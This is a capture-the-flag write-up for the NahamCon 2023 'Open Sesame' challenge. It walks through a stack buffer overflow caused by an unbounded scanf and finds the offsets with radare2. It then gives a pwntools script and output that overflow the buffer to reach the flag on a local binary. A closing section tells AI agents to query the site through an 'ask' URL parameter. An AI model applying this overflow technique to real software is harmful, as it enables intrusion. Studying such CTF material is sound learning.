# Open Sesame

```
#define SECRET_PASS "OpenSesame!!!"

Bool isPasswordCorrect(char *input)
{
    return (strncmp(input, SECRET_PASS, strlen(SECRET_PASS)) == 0) ? yes : no;
}

void caveOfGold()
{
    Bool caveCanOpen = no;
    char inputPass[256];

    puts("BEHOLD THE CAVE OF GOLD\n");

    puts("What is the magic enchantment that opens the mouth of the cave?");
    flushBuffers();

    scanf("%s", inputPass);

# The binary is vulnerable to a Stack-Based Buffer Overflow attack - it is a x64 bit ELF executable with NX enabled.
i~nx,pie,endian,rel
endian   little
nx       true
relocs   true
relro    partial
# We can generate a cyclic pattern with ragg2 -P 300 -r to cause a segment error

dc
BEHOLD THE CAVE OF GOLD

What is the magic enchantment that opens the mouth of the cave?
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB
ERROR, INCORRECT PASSWORD!
[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0

# If we run wopO `dr rbp` we can find the offset to the base pointer
> wopO `dr rbp`
272
# We know that OpenSesame!!! is the password so we can subtract the length of it by the offset of the RBP to get 259 - that means we need 259 bits of padding AFTER supplying the password -> ('OpenSesame!!!'+b"A"*259)

# Next, we need to get the offset of the stack pointer using wopO
> pxw @ rsp
0x7fffffffde08  0x41684241 0x42416942 0x6b42416a 0x416c4241  ABhABiABjABkABlA
[...]
> wopO 0x41684241
280
# So we need 8 more characters added after our padding
('OpenSesame!!!'+b"A"*259+b"B"*8)

# Let's make our exploit script
```

```python
#!/usr/bin/env python3
# print("OpenSesame!!!" + "A"*259 + "B"*8)

from pwn import *

payload = b"OpenSesame!!!"
payload += b"A"*259
payload += b"B"*8

p = process("./open_sesame")

p.clean()
p.sendline(payload)
log.info(p.clean())
```

```bash
python3 exploit.py
[+] Starting local process './open_sesame': pid 10635
/home/lavender/.local/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] YOU HAVE PROVEN YOURSELF WORTHY HERE IS THE GOLD:
[*] Stopped process './open_sesame' (pid 10635)

# You can make a flag file to test this
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.securescape.cc/capture-the-flag/competitions/nahamcon/nahamcon-2023/binary-exploitation/open-sesame.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.